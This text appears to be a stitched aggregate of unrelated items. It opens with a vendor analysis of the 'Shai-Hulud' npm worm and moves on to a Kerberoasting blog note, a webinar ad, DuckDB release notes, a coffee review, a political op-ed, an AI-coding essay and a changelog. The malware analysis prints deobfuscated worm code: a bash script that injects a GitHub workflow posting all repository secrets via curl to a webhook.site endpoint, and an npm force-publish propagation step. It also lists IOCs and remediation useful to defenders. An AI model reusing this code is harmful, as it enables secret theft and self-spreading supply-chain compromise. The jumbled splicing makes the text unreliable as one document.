In this post, we'll dive deep into the payload's mechanics, including deobfuscated code snippets, API call traces, and diagrams to illustrate the attack chain. Our analysis reveals a Webpack-bundled script (bundle.js) that leverages Node.js modules for reconnaissance, harvesting, and propagation; targeting Linux/macOS devs with access to NPM/GitHub/cloud creds.
Technical Analysis
The attack unfolds through a sophisticated multi-stage chain that leverages Node.js's process.env for opportunistic credential access and employs Webpack-bundled modules for modularity. At the core of this attack is a ~3.6MB minified bundle.js file, which executes asynchronously during npm install. This execution is likely triggered via a hijacked postinstall script embedded in the compromised package.json.
Self-Propagation Engine
The malware includes a self-propagation mechanism through the NpmModule.updatePackage function. This function queries the NPM registry API to fetch up to 20 packages owned by the maintainer, then force-publishes patches to these packages. This creates a cascading compromise effect, recursively injecting the malicious bundle into dependent ecosystems across the NPM registry.
Credential Harvesting
The malware repurposes open-source tools like TruffleHog to scan the filesystem for high-entropy secrets. It searches for patterns such as AWS keys using regular expressions like AKIA[0-9A-Z]{16}. Additionally, the malware dumps the entire process.env, capturing transient tokens such as GITHUB_TOKEN and AWS_ACCESS_KEY_ID.
For cloud-specific operations, the malware enumerates AWS Secrets Manager using SDK pagination and accesses Google Cloud Platform secrets via the @google-cloud/secret-manager API. The malware specifically targets the following credentials:
The malware establishes persistence by injecting a GitHub Actions workflow file (.github/workflows/shai-hulud-workflow.yml) via a base64-encoded bash script. This workflow triggers on push events and exfiltrates repository secrets using the expression ${{ toJSON(secrets) }} to a command and control endpoint. The malware creates branches by force-merging from the default branch (refs/heads/shai-hulud) using GitHub's /git/refs endpoint.
Data Exfiltration
The malware aggregates harvested credentials into a JSON payload, which is pretty-printed for readability. It then uploads this data to a new public repository named
Shai-Hulud
via the GitHub /user/repos API.
The entire attack design assumes Linux or macOS execution environments, checking for os.platform() === 'linux' || 'darwin'. It deliberately skips Windows systems. For a visual breakdown, see the attack flow diagram below:
Attack Mechanism
The compromise begins with a sophisticated minified JavaScript bundle injected into affected packages like @ctrl/tinycolor. This is not rudimentary malware but rather a sophisticated modular engine that uses Webpack chunks to organize OS utilities, cloud SDKs, and API wrappers.
The payload imports six core modules, each serving a specific function in the attack chain.
OS Recon (Module 71197)
This module calls getSystemInfo() to build a comprehensive system profile containing platform, architecture, platformRaw, and archRaw information. It dumps the entire process.env, capturing sensitive environment variables including AWS_ACCESS_KEY_ID, GITHUB_TOKEN, and other credentials that may be present in the environment.
Credential Harvesting Across Clouds
AWS (Module 56686)
The AWS harvesting module validates credentials using the STS AssumeRoleWithWebIdentityCommand. It then enumerates secrets using the @aws-sdk/client-secrets-manager library.
The module handles errors such as DecryptionFailure or ResourceNotFoundException silently through decorateServiceException wrappers. It targets all AWS regions via endpoint resolution.
GCP (Module 9897)
The GCP module uses @google-cloud/secret-manager to list secrets matching the pattern projects/
/secrets/
. It implements pagination using nextPageToken and returns objects containing the secret name and decoded payload. The module fails silently on PERMISSION_DENIED errors without alerting the user.
Filesystem Secret Scanning (Module 94913)
This module spawns TruffleHog via child_process.exec('trufflehog filesystem / --json') to scan the entire filesystem. It parses the output for high-entropy matches, such as AWS keys found in ~/.aws/credentials.
Propagation Mechanics
NPM Pivot (Module 40766)
The NPM propagation module parses NPM_TOKEN from either ~/.npmrc or environment variables. After validating the token via the /whoami endpoint, it queries /v1/search?text=maintainer:${username}&size=20 to retrieve packages owned by the maintainer.
// Deobfuscated NPM update snippetasyncupdatePackage(pkg) {
// Patch package.json (add self as dep?) and publishawait exec(`npm version patch --force && npm publish --access public --token ${token}`);
}
This creates a cascading effect where an infected package leads to compromised maintainer credentials, which in turn infects all other packages maintained by that user.
GitHub Backdoor (Module 82036)
The GitHub backdoor module authenticates via the /user endpoint, requiring repo and workflow scopes. After listing organizations, it injects malicious code via a bash script (Module 941).
Here is the line-by-line bash script deconstruction:
# Deobfuscated Code snippet#!/bin/bashGITHUB_TOKEN="$1"BRANCH_NAME="shai-hulud"FILE_NAME=".github/workflows/shai-hulud-workflow.yml"FILE_CONTENT=$(cat <<'EOF'on: push # Trigger on any pushjobs: process
runs-on: ubuntu-latest
steps:
- run: curl -d "$CONTENTS" https://webhook.site/bb8ca5f6-4175-45d2-b042-fc9ebb8170b7; # C2 exfilecho"$CONTENTS" | base64 -w 0 | base64 -w 0 # Double-base64 for evasion env: CONTENTS: ${{ toJSON(secrets) }} # Dumps all repo secrets (GITHUB_TOKEN, AWS keys, etc.)EOF
)
github_api() { curl -s -X "$1" -H "Authorization: token $GITHUB_TOKEN" ... "$API_BASE$2" }
REPOS_RESPONSE=$(github_api GET "/user/repos?affiliation=owner,collaborator,organization_member&since=2025-01-01T00:00:00Z&per_page=100")
while IFS= read -r repo; do# Get default branch SHA REF_RESPONSE=$(github_api GET "/repos/$REPO_FULL_NAME/git/ref/heads/$DEFAULT_BRANCH")
BASE_SHA=$(jq -r '.object.sha' <<< "$REF_RESPONSE")
BRANCH_DATA=$(jq -n '{ref: "refs/heads/shai-hulud", sha: "$BASE_SHA"}')
github_api POST "/repos/$REPO_FULL_NAME/git/refs""$BRANCH_DATA"# Handles "already exists" gracefully FILE_DATA=$(jq -n '{message: "Add workflow", content: "$(base64 <<< "$FILE_CONTENT")", branch: "shai-hulud"}')
github_api PUT "/repos/$REPO_FULL_NAME/contents/$FILE_NAME""$FILE_DATA"# Overwrites if existsdone
This mechanism ensures persistence, as secrets are exfiltrated to the command and control server on the next push event.
Exfiltration
The malware builds a comprehensive JSON payload containing system information, environment variables, and data from all modules. It then creates a public repository via the GitHub /repos POST endpoint using the function
makeRepo('Shai-Hulud')
. The repository is public by default to ensure easy access for the command and control infrastructure.
The attack employs several evasion techniques including silent error handling (swallowed via catch {} blocks), no logging output, and disguising TruffleHog execution as a legitimate "security scan."
Indicators of Compromise
The following indicators can help identify systems affected by this attack:
GitHub Search Queries for Detection
Use these GitHub search queries to identify potentially compromised repositories across your organization:
Search for malicious workflow file
Replace
ACME
with your GitHub organization name and use the following GitHub search query to discover all instance of
shai-hulud-workflow.yml
in your GitHub environment.
To find malicious branches, you can use the following Bash script:
# List all repos and check for shai-hulud branchgh repo list YOUR_ORG_NAME --limit 1000 --json nameWithOwner --jq '.[].nameWithOwner' | whileread repo; do gh api "repos/$repo/branches" --jq '.[] | select(.name == "shai-hulud") | "'$repo' has branch: " + .name'done
File Hashes
The malicious bundle.js file has a SHA-256 hash of:
46faab8ab153fae6e80e7cca38eab363075bb524edd79e42269217a083628f09
Presence of malicious workflow file:
.github/workflows/shai-hulud-workflow.yml
Suspicious Function Calls
Calls to
NpmModule.updatePackage
function
Suspicious API Calls
AWS API calls to
secretsmanager.*.amazonaws.com
endpoints, particularly
BatchGetSecretValueCommand
GCP API calls to
secretmanager.googleapis.com
NPM registry queries to
registry.npmjs.org/v1/search
GitHub API calls to
api.github.com/repos
Suspicious Process Executions
TruffleHog execution with arguments
filesystem /
NPM publish commands with
--force
flag
Curl commands targeting webhook.site domains
Affected Packages
The following packages have been confirmed as compromised:
Package Name
Version(s)
@ctrl/tinycolor
4.1.1, 4.1.2
angulartics2
14.1.2
@ctrl/deluge
7.2.2
@ctrl/golang-template
1.4.3
@ctrl/magnet-link
4.0.4
@ctrl/ngx-codemirror
7.0.2
@ctrl/ngx-csv
6.0.2
@ctrl/ngx-emoji-mart
9.2.2
@ctrl/ngx-rightclick
4.0.2
@ctrl/qbittorrent
9.7.2
@ctrl/react-adsense
2.0.2
@ctrl/shared-torrent
6.3.2
@ctrl/torrent-file
4.1.2
@ctrl/transmission
7.3.1
@ctrl/ts-base32
4.0.2
encounter-playground
0.0.5
json-rules-engine-simplified
0.2.4, 0.2.1
koa2-swagger-ui
5.11.2, 5.11.1
@nativescript-community/gesturehandler
2.0.35
@nativescript-community/sentry
4.6.43
@nativescript-community/text
1.6.13
@nativescript-community/ui-collectionview
6.0.6
@nativescript-community/ui-drawer
0.1.30
@nativescript-community/ui-image
4.5.6
@nativescript-community/ui-material-bottomsheet
7.2.72
@nativescript-community/ui-material-core
7.2.76
@nativescript-community/ui-material-core-tabs
7.2.76
ngx-color
10.0.2
ngx-toastr
19.0.2
ngx-trend
8.0.1
react-complaint-image
0.0.35
react-jsonschema-form-conditionals
0.3.21
react-jsonschema-form-extras
1.0.4
rxnt-authentication
0.0.6
rxnt-healthchecks-nestjs
1.0.5
rxnt-kue
1.0.7
swc-plugin-component-annotate
1.9.2
ts-gaussian
3.0.6
Immediate Actions Required
If you use any of the affected packages, take these actions immediately:
Identify and Remove Compromised Packages
# Check for affected packages in your projectnpm ls @ctrl/tinycolor
# Remove compromised packagesnpm uninstall @ctrl/tinycolor
# Search for the known malicious bundle.js by hashfind . -type f -name "*.js" -exec sha256sum {} \; | grep "46faab8ab153fae6e80e7cca38eab363075bb524edd79e42269217a083628f09"
Clean Infected Repositories
Remove Malicious GitHub Actions Workflow
# Check for and remove the backdoor workflowrm -f .github/workflows/shai-hulud-workflow.yml
# Look for suspicious 'shai-hulud' branches in all repositoriesgit ls-remote --heads origin | grep shai-hulud
# Delete any malicious branches foundgit push origin --delete shai-hulud
Rotate All Credentials Immediately
The malware harvests credentials from multiple sources. Rotate ALL of the following:
NPM tokens (automation and publish tokens)
GitHub personal access tokens
GitHub Actions secrets in all repositories
SSH keys used for Git operations
AWS IAM credentials, access keys, and session tokens
Google Cloud service account keys and OAuth tokens
Azure service principals and access tokens
Any credentials stored in AWS Secrets Manager or GCP Secret Manager
API keys found in environment variables
Database connection strings
Third-party service tokens
CI/CD pipeline secrets
Audit Cloud Infrastructure for Compromise
Since the malware specifically targets AWS Secrets Manager and GCP Secret Manager, you need to audit your cloud infrastructure for unauthorized access. The malware uses API calls to enumerate and exfiltrate secrets, so reviewing audit logs is critical to understanding the scope of compromise.
AWS Security Audit
Start by examining your CloudTrail logs for any suspicious secret access patterns. Look specifically for BatchGetSecretValue, ListSecrets, and GetSecretValue API calls that occurred during the time window when the compromised package may have been installed. Also generate and review IAM credential reports to identify any unusual authentication patterns or newly created access keys.
# Check CloudTrail for suspicious secret accessaws cloudtrail lookup-events --lookup-attributes AttributeKey=EventName,AttributeValue=BatchGetSecretValue
aws cloudtrail lookup-events --lookup-attributes AttributeKey=EventName,AttributeValue=ListSecrets
aws cloudtrail lookup-events --lookup-attributes AttributeKey=EventName,AttributeValue=GetSecretValue
# Review IAM credential reports for unusual activityaws iam get-credential-report --query 'Content'
GCP Security Audit
For Google Cloud Platform, review your audit logs for any access to the Secret Manager service. The malware uses the @google-cloud/secret-manager library to enumerate secrets, so look for unusual patterns of secret access. Additionally, check for any unauthorized service account key creation, as these could be used for persistent access.
Block outbound connections to
webhook.site
domains immediately
Monitor firewall logs for connections to
https://webhook.site/bb8ca5f6-4175-45d2-b042-fc9ebb8170b7
Implement Security Controls
GitHub Security Hardening
Review and remove unnecessary GitHub Apps and OAuth applications
Audit all repository webhooks for unauthorized additions
Check deploy keys and repository secrets for all projects
Enable branch protection rules to prevent force-pushes
Turn on GitHub Secret Scanning alerts
Enable Dependabot security updates
Ongoing Monitoring
Set up alerts for any new npm publishes from your organization
Monitor CloudTrail/GCP audit logs for secret access patterns
Implement regular credential rotation policies
Use separate, limited-scope tokens for CI/CD pipelines
For StepSecurity Enterprise Customers
The following steps are applicable only for StepSecurity enterprise customers. If you are not an existing enterprise customer, you can start our 14 day free trial by installing
the StepSecurity GitHub App
to complete the following recovery step.
Use NPM Package Cooldown Check
The NPM Cooldown check
automatically fails a pull request if it introduces an npm package version that was released within the organization’s configured cooldown period (default: 2 days). Once the cooldown period has passed, the check will clear automatically with no action required. The rationale is simple - most supply chain attacks are detected within the first 24 hours of a malicious package release, and the projects that get compromised are often the ones that rushed to adopt the version immediately. By introducing a short waiting period before allowing new dependencies, teams can reduce their exposure to fresh attacks while still keeping their dependencies up to date.
Here is an example showing how this check protected a project from using the compromised versions of packages involved in this incident:
Discover Pull Requests upgrading to compromised npm packages
We have added a new control specifically to detect pull requests that upgraded to these compromised packages. You can find the new control on the StepSecurity dashboard.
Use StepSecurity Harden-Runner to detect compromised dependencies in CI/CD
StepSecurity Harden-Runner adds runtime security monitoring to your GitHub Actions workflows, providing visibility into network calls, file system changes, and process executions during CI/CD runs. Harden-Runner detects the compromised nx packages when they are used in CI/CD. Here is a sample Harden-Runner insights page demonstrating this detection:
If you're already using Harden-Runner, we strongly recommend you review recent anomaly detections in your Harden-Runner dashboard. You can get started with Harden-Runner by following the guide at
https://docs.stepsecurity.io/harden-runner
.
Use StepSecurity Artifact Monitor to detect software releases outside of authorized pipelines
StepSecurity Artifact Monitor provides real-time detection of unauthorized package releases by continuously monitoring your artifacts across package registries. This tool would have flagged this incident by detecting that the compromised versions were published outside of the project's authorized CI/CD pipeline. The monitor tracks release patterns, verifies provenance, and alerts teams when packages are published through unusual channels or from unexpected locations. By implementing Artifact Monitor, organizations can catch supply chain compromises within minutes rather than hours or days, significantly reducing the window of exposure to malicious packages.
Senator Ron Wyden has asked the Federal Trade Commission to investigate Microsoft over its continued use of the RC4 encryption algorithm. The letter talks about a hacker technique called Kerberoasting, that exploits the Kerberos authentication system....
Senator Ron Wyden has
asked
the Federal Trade Commission to
investigate
Microsoft over its continued use of the RC4 encryption algorithm. The letter talks about a hacker technique called
Kerberoasting
, that exploits the Kerberos authentication system.
I am a
public-interest technologist
, working at the intersection of security, technology, and people. I've been writing about security issues on my
blog
since 2004, and in my monthly
newsletter
since 1998. I'm a fellow and lecturer at Harvard's
Kennedy School
, a board member of
EFF
, and the Chief of Security Architecture at
Inrupt, Inc.
This personal website expresses the opinions of none of those organizations.
Webinar: Your browser is the breach — securing the modern web edge
Bleeping Computer
www.bleepingcomputer.com
2025-09-16 12:01:08
The web browser has quietly become one of the most critical components of enterprise infrastructure—and one of the most dangerous. Join BleepingComputer, SC Media, and Push Security on September 29 at 12:00 PM ET for a live webinar on how attackers are targeting the browser to hijack sessions, steal...
The web browser has quietly become one of the most critical components of enterprise infrastructure—and one of the most dangerous.
On September 29th at 12:00 PM ET, BleepingComputer and SC Media will co-host a live webinar with browser security experts from
Push Security
, exploring how modern web browsers have become the primary attack surface for identity-based intrusions, SaaS abuse, and session hijacking.
The webinar "
Your Browser Is the Breach: Securing the Modern Web Edge
" will explore the evolving threat landscape targeting corporate browsers and reveal how attackers compromise accounts, steal data, and bypass traditional defenses—all from within the browser itself.
Push Security offers a real-time detection and response platform built for the browser, where identity attacks actually happen. Their technology gives security teams the visibility and control they need to detect risky behavior, protect SaaS sessions, and defend against credential compromise.
In this must-watch webinar, you'll learn how attackers are targeting browsers with malicious extensions, session token theft, OAuth abuse, and shadow extensions—alongside emerging threats like ClickFix and FileFix attacks—and what security teams can do to stop them.
Modern browsers now handle everything from authentication to sensitive SaaS data—and attackers have taken notice.
From phishing kits that harvest session tokens to stealthy extensions that evade detection, browser-based threats are growing rapidly. Traditional endpoint and identity tools often miss these attacks entirely, leaving dangerous gaps in enterprise defenses.
The upcoming webinar will cover:
How the browser became a high-value endpoint and attack surface
Common tactics for browser-based compromise, including extension abuse and session hijacking
Real-world strategies to detect malicious browser activity and close security control gaps
How to protect SaaS sessions and restore visibility at the web edge
The event will be hosted by Adrian Sanabria and browser security experts from Push Security.
Don't miss this opportunity to gain real-world insight into today's browser-based threats and learn how to take back control of your web edge.
TL;DR: We're releasing DuckDB version 1.4.0, codenamed “Andium”. This is an LTS release with one year of community support, and it packs several new features including database encryption, the MERGE statement and Iceberg writes.
We are proud to release DuckDB v1.4.0, named “Andium” after the
Andean teal
(Anas andium), which lives in the Andean highlands of Colombia, Venezuela and Ecuador.
In this blog post, we cover the most important updates for this release around support, features and extensions. DuckDB is moving rather quickly, and we could cover only a small fraction of the changes in this release. For the complete release notes, see the
release page on GitHub
.
To install the new version, please visit the
installation page
. Note that it can take a few days to release some client libraries (e.g., Go, R, Java) due to the extra changes and review rounds required.
We are delighted to see that DuckDB is used regularly in production environments and realize that such deployments often come with a requirement for long-term maintenance.
In the past, we would automatically deprecate old DuckDB versions whenever the newer version was released. But we’re changing this today.
Starting with this release, every
other
DuckDB version is going to be a Long Term Support (LTS) edition.
For LTS DuckDB versions,
community support
will last a year after the release (for now).
DuckDB Labs
is also starting to offer support for older LTS versions after their community support has expired.
Click to see the end-of-life (EOL) dates for DuckDB releases.
Being able to encrypt DuckDB database files has been a
long-standing feature request
. Starting with this release, DuckDB supports encryption of its files. Encryption keys are given using the
ENCRYPTION_KEY
parameter
to
ATTACH
, like so:
DuckDB uses the industry-standard
AES encryption
with a key length of 256 bits using the recommended
GCM
mode by default.
The encryption covers the main database file, the write-ahead-log (WAL) file, and even temporary files. To encrypt data, DuckDB can use either the built-in
mbedtls
library or the OpenSSL library from the
httpfs
extension. Note that the OpenSSL versions are much faster due to hardware acceleration, so make sure to
LOAD httpfs
for good encryption performance.
DuckDB now supports
MERGE INTO
as an alternative to
INSERT INTO ... ON CONFLICT
.
MERGE INTO
does not require a primary key since it works on any custom merge condition. This is a very common statement in OLAP systems that do not support primary keys but still want to support upserting (i.e.,
UPDATE
plus
INSERT
) functionality.
In this example we use a simple condition matching on a key and we call the
RETURNING
statement to get a summary of the updated and inserted rows.
Community member
Rusty Conover (@rustyconover)
contributed
an ETA (estimated time of arrival) feature to the DuckDB command line client. Estimating the remaining time is a
difficult problem
as progress measurements can vary a lot due to noise. To alleviate this, the ETA feature first collects some initial performance data, then continues to refine its estimate using a
Kalman filter
. Here's how it works in practice:
Richard (@hawkfish)
built a new window function,
FILL
, that can be used to
interpolate
missing values in ordered windows. Here is an example, you can see a missing value between 1 and 42, it's interpolated to 21 in the result.
Laurens (@lnkuiper)
rewrote DuckDB’s sorting implementation
(
again
). This new implementation uses a k-way merge sort to reduce data movement. It is also adaptive to pre-sorted data and uses a new API that makes it possible to use this new sorting code elsewhere in DuckDB, for example in window functions. We are seeing much better thread scaling performance with this implementation. We will publish a separate blog post with more detailed performance measurements.
Common table expressions (CTEs) are now materialized by default (instead of inlining them). This both improves performance and resolves some correctness bugs that happened due to inlining.
This feature was
implemented
by
Denis Hirn (kryonix)
, who
contributed support for recursive CTEs
back in 2020.
MacOS has a fairly advanced model to ensure system integrity built around cryptographic signatures along with so-called “
notarization
” by Apple. We had been signing our binaries
for about two years already
.
Starting from this release, the DuckDB command line utility (
duckdb
) and the dynamic library
libduckdb…dylib
are
released with this notarization
. This will reduce the amount of complaints when using web browsers to download our binaries. Unfortunately, macOS does not yet fully support notarization of command line utility, so the “open with double click” use case will still have to wait. The recommended path to install the CLI on macOS is still our install script:
curl https://install.duckdb.org | bash
We have been slowly moving language integrations (“clients”) into their own repositories from
duckdb/duckdb
. For this release, we moved the Python client to its
own repository
,
duckdb/duckdb-python
. Please make sure to
file issues
related to the Python client there.
These were a few highlights – but there are many more features and improvements in this release. There have been over 3,500 commits by over 90 contributors since we released v1.3.2. The full release notes can be
found on GitHub
. We would like to thank our community for providing detailed issue reports and feedback. And our special thanks goes to external contributors, who directly landed features in this release!
How I brew cafe-quality coffee anywhere, from campsite to carry-on
Guardian
www.theguardian.com
2025-09-16 12:00:05
When you’re done settling for the sludge in the hotel lobby, this portable brewing setup will open the door to perfect coffee anywhere Nothing makes me feel more settled than making a cup of coffee in the morning. Without it, my whole day feels slightly off. For years, that was just something I acce...
N
othing makes me feel more settled than making a cup of coffee in the morning. Without it, my whole day feels slightly off. For years, that was just something I accepted about traveling or camping – there
might
be coffee, but it wouldn’t quite ground me. It would be a compromise. A little off.
That’s why I’ve spent the past few years perfecting my travel coffee setup: so I can make rich, comforting, homey coffee anywhere in the world,
without
trying to wedge an espresso machine into my carry-on. Here are the inexpensive tools that make it possible.
Aeropress + Fellow Prismo
Photograph: Jaina Rodríguez-Grey
This is the star of the show. The humble Aeropress is a remarkably versatile, durable little device that’s seen me through conferences, multi-state moves, and even a stretch of couch surfing between friends’ places. At its core, it’s just a simple plastic cylinder with a plunger. Add your coffee grounds, pour in hot water, give it a stir, and then plunge it like a giant syringe.
I made one key upgrade, though: instead of the standard cap and paper filters, I use the Fellow Prismo, a high-pressure cap with a reusable metal filter. This swap both eliminates the need for paper filters, and aerates the coffee as you press, giving it a touch of crema and a boost in both flavor and aroma.
When I’m staying in a hotel, I’ll usually track down a local cafe and pick up a bag of beans. Most spots are happy to grind them for you, and it’s worth it: those commercial-grade burr grinders give you an incredibly even grind, which makes a big difference in flavor.
Plus, it’s a great way to connect with the local coffee scene. You’re not just getting a caffeine fix — you’re tasting your travels, supporting a small business, and maybe discovering a roast you’ll end up ordering again once you’re back home. On trips to Seattle, I used to drop in to Caffe Vita for a bag of its rich and velvety Queen City blend, and Kuma
Coffee
for Momma Bear, a half-caf blend that makes my afternoons wonderfully buzzy without ruining my sleep schedule.
Coffee storage
Photograph: Jaina Rodríguez-Grey
Going to a cafe isn’t always an option though, especially if you’re miles deep in the wilderness. For those times, you’ll want to rely on either pre-ground or whole beans in an airtight container. I’ve had success using a small mason jar with an airtight lid. Durable, washable, reusable.
Some travel containers like the Fellow Atmos offer a vacuum-seal feature, but I’ve tested my mason jar against dozens of vacuum sealed containers, and honestly I can’t taste a difference unless I let the coffee sit for three to four days, unopened. As long as you open your mason jar every couple days, you shouldn’t get any flavor issues. So for our purposes here, I just find a mason jar to be the easiest, cheapest, and most versatile pick by far.
If you’re traveling with whole beans and want that fresh-ground flavor every time, you’ll need a grinder that’s compact and reliable. I recommend the
Hario Skerton Plus
. It’s the perfect size to pair with an Aeropress, and its ceramic burrs grind consistently without overheating your beans. It fits in your hand, packs easily and gets the job done, whether you’re camping or posted up in a hotel room.
If you’ll have access to power, the
Fellow Stagg EKG
is my go-to travel kettle. It’s sleek, quick-heating, and insulated well enough to keep your water hot for close to an hour. The gooseneck spout gives you precise control for brewing, and the compact body fits into a carry-on without issue. I often pack my Aeropress inside the kettle itself, then stash the whole bundle in my suitcase.
I’ve had mine for nearly five years. It’s a little scuffed from all the travel, but still runs perfectly – and I use it literally every day.
If you’re in the woods, the Filter US editor Nick Mokey recommends the Camp Chef Stryker 200, which runs on either compact isobutane canisters, or the ubiquitous green propane cylinders you can find at any gas station. It’s also crazy fast, boiling enough water for two cups of coffee in under two minutes.
Jaina Rodríguez-Grey is a freelance journalist and coffee obsessive whose work has appeared in Wired, Vice, Westlaw and beyond. She’s covered everything from civil litigation to video games and sex tech. When she’s not testing espresso machines or coffee grinders, she’s either making her way through Seattle’s cafe scene – or remembering (finally) to update her newsletter
Trump Sanctions Palestinian Human Rights Groups for Doing Their Job. Anybody Could Be Next.
Intercept
theintercept.com
2025-09-16 12:00:00
It’s the first time the U.S. has sanctioned an organization specifically for using lawful, peaceful tools of advocacy.
The post Trump Sanctions Palestinian Human Rights Groups for Doing Their Job. Anybody Could Be Next. appeared first on The Intercept....
Benjamin Netanyahu and Donald Trump during a dinner in the White House on July 7, 2025, in Washington.
Photo: Andrew Harnik/Getty Images
Sarah Leah Whitson is the executive director of
DAWN
.
For decades, the
Treasury Department has politicized its authority to impose sanctions. Now, however, with the Trump administration sanctioning three Palestinian human rights organizations, civil society activists around the world are shocked and terrified: Could they be next?
The alarm is due to the brazen willingness of President Donald Trump to sanction the staff of these Palestinian groups specifically because of their advocacy with the International Criminal Court to hold Israeli war criminals accountable.
It’s the first time the U.S. has levied sanctions against an organization specifically for its efforts to use lawful, peaceful tools of advocacy in pursuit of legal accountability. There is no pretense other than the groups’ work on legal issues that the administration doesn’t like.
Trump has global civil society directly in the crosshairs.
Copying another page from the authoritarian playbook, Trump now has global civil society directly in the crosshairs of the U.S. government’s legal, financial, and criminal arsenals. The next disfavored issue, these groups fear, could be climate change, arms control, or reproductive rights — virtually anything.
To justify its recent sanctions against Al Haq, Al Mezan Center for Human Rights, and the Palestinian Center for Human Rights, the Treasury
announcement
said the groups “directly engaged in efforts by the International Criminal Court (ICC) to investigate, arrest, detain, or prosecute Israeli nationals.”
The only other sanction the U.S. ever imposed on a human rights organization was earlier this year against Addameer, a Palestinian group that the Trump administration
claimed
was linked to the Popular Front for the Liberation of Palestine, a U.S.-designated terrorist organization.
Blocking Accountability
Trump has gone far out of his way to shield Israel from any form of judicial accountability for its atrocities in Gaza, illegal occupation, and apartheid rule.
The sanctions on the Palestinian organizations follow extensive attacks and threats against the ICC itself, including sanctions against the ICC prosecutor who
secured
the
arrest warrants
against Israeli Prime Minister Benjamin Netanyahu and former Defense Minister Yoav Gallant. Later, four of the judges who approved the warrants were also sanctioned.
The new Treasury sanctions also follow lockstep with Israel’s near-identical
sanctions
against human rights groups and activists. On June 30, Israel imposed sanctions on Al Haq Europe, Law for Palestine, the Hind Rajab Foundation, Lawyers for Palestinian Human Rights, and DAWN, where I am the executive director. Additionally, Israel targeted individual staffs of these organizations, myself included.
As with the U.S., Israel explained these moves as punishment for the work these groups did with the ICC’s Palestine prosecution.
Both the Israeli and U.S. sanctions clearly violate the Rome Statute, the treaty that established and governs the ICC.
Article 70
of the treaty prohibits obstruction of justice, and the sanctions by Israel and the U.S. are seeking to interfere with the court’s prosecution.
For Americans caught up in the sanctions, there are also First Amendment issues. The sanctions could chill protected speech, advocacy, or engagement by hanging “material support” charges over the heads of those who would work with the ICC or the sanctioned Palestinian organizations. Federal courts have already
concluded
that this chilling effect can take place, issuing preliminary injunctions in
two cases
in favor of plaintiffs who argued the sanctions had impinged on their free speech rights.
Short of a judicial ruling overturning the sanctions entirely, however, Americans will remain in fear of prosecution simply for talking to the court or these organizations.
All for Israel
The effectively unregulated ability of the U.S. to deploy its powerful sanctions arsenal has now moved beyond the usual grounds of terrorism, human rights abuses, or violation of U.S. laws or other sanctions to include anything the Trump administration disfavors.
There’s nothing to stop this administration from seeking to sanction any other organization in the world for pursuing advocacy odds with Trump’s worldview.
The Biden administration’s feeble
effort
to reform America’s gargantuan global sanctions regime, which it critiqued as an overused “tool of first resort,” ended up producing a seven-page report and zero concrete action.
Secretary of State Marco Rubio and congressional Republicans have made no secret of their aim to crush pro-Palestine activism with every tool available. Immigrant students were the first targets,
swept
into
deportation proceedings
for their speech about Palestine.
Now, the administration and its allies are pursuing more concrete moves. Last week, Rep. Brian Mast, R-Fla.,
introduced
a bill that would allow the secretary of state to revoke the passports of Americans they accuse of giving material support to a terrorist group.
As happened with immigrant students, the provision could easily be used to label criticism of Israel as tantamount to support for Palestinian groups, such as Hamas, designated as terrorists by the U.S. (Following The Intercept’s
coverage
of the bill and widespread opposition to the measure, Mast
moved to strike the language
.)
The passport bill followed a narrowly
defeated effort
to include a provision in Trump’s “One Big Beautiful Bill Act” that would allow the Treasury Department to strip nonprofit organizations of their tax-exempt status merely by accusing them of supporting terrorism.
Efforts to quash Israel’s prosecution at the ICC with these sanctions may seem less dangerous than U.S. military and financial support for Israel’s genocide in Gaza, efforts to annex the West Bank, and military attacks against seven other countries in the Middle East. And the sanctions may be less consequential than the unprecedented attack on academic freedom by
punishing universities
for speech critical of Israel.
What the sanctions do, though, is open up an entirely new front for the Trump administration’s global attack on civil society around the world — all in defense of Israel.
A few people have asked me how I use AI coding tools. I don’t think it’s a straightforward answer.
For me it’s not really a procedure or recipe, it’s more of an ethos.
Principle: Ownership
You own the code your AI produces.
Use your own name to commit AI code so that if something breaks, everyone
blames
you. This is critical. How well
do you need to know the code your AI produces? Well enough that you can answer for it’s mistakes.
In lean manufacturing they have the principle of
Genchi genbutsu
, i.e. “go and
see for yourself
.” In
High Output Management
, Andy Grove pushes “management by walking around”. Andy defines the output
of a manager as the output of their entire org as well as the organizations under their influence.
The trouble with phrasing it as “AI coding” is it tricks you into thinking it’s just another individual role
like software engineering, where it actually has a lot more in common with management. It’s unfortunate we
hire and mentor for it as if it was software engineering.
What does the algorithm
actually
do?
Did it find
all
of the places to refactor?
Resist the urge to say, “oh, I
just
vibe coded this”.
You
coded it, and if it sucks, it’s because you
don’t know how to manage your AI. Own it.
Principle: Exploit Gradients
Not all time spent is equal. For some things, you can put in a
little
bit of effort and get a
huge
amount
of reward. In business, we call those
opportunities
.
Examples:
Biology
: A tiger migrates to where there’s more food.
Less effort for more food.
Arbitrage
: Buy cheap, send to another country and sell expensive.
Less effort for more money.
AI coding isn’t about writing code, it’s about creating and exploiting gradients. Finding opportunities
where you can spend 10 minutes of AI time and reap a huge reward.
The contrived example is proof of concepts. You can
just do it
, figure out if it really works in practice
as it seems like it should, and abandon it quickly when it doesn’t.
Or data analysis. Traditionally it was labor intensive to do data analysis, but you can spin out a sick
dashboard in a few minutes. Maybe that helps you avoid a dead end, or
push
your org in a new direction.
The key is to always be on the lookout for opportunities.
That feels a lot more like a shrewd businessman than a software engineer. Indeed! It’s a mistake that
we transparently hire and promote software engineers into these roles. It’s a new beast.
How to become a AI Coder
I’m terrified of the future of software engineering.
Oh, I’ll continue having a job for a very long time. No concern about that. I’m worried that
junior
engineers won’t be promoted because it’s easier to dispatch a request to an AI than to give juniors the
tasks that they traditionally learned the trade from.
But actually, this isn’t software engineering.
If anyone with their head on straight can take ownership and exploit gradients, then maybe junior engineers
have an
edge
on seniors who are too stuck in their ways to realize they’ve been put in a new job role.
Task now includes built-in core utilities to greatly improve compatibility on Windows. This means that your commands that uses
cp
,
mv
,
mkdir
or any other common core utility will now work by default on Windows, without extra setup. This is something we wanted to address for many many years, and it's finally being shipped!
Read our blog post about this topic
. (
#197
,
#2360
by
@andreynering
).
Began releasing
nightly builds
. This will allow people to test our changes before they are fully released and without having to install Go to build them (
#2358
by
@vmaerten
).
Added experiments to the taskrc schema to clarify the expected keys and values (
#2235
by
@vmaerten
).
Added support for new properties in
.taskrc.yml
: insecure, verbose, concurrency, remote offline, remote timeout, and remote expiry.
⚠️
Note: setting offline via environment variable is no longer supported. (
#2389
by
@vmaerten
)
Added a
--nested
flag when outputting tasks using
--list --json
. This will output tasks in a nested structure when tasks are namespaced (
#2415
by
@pd93
).
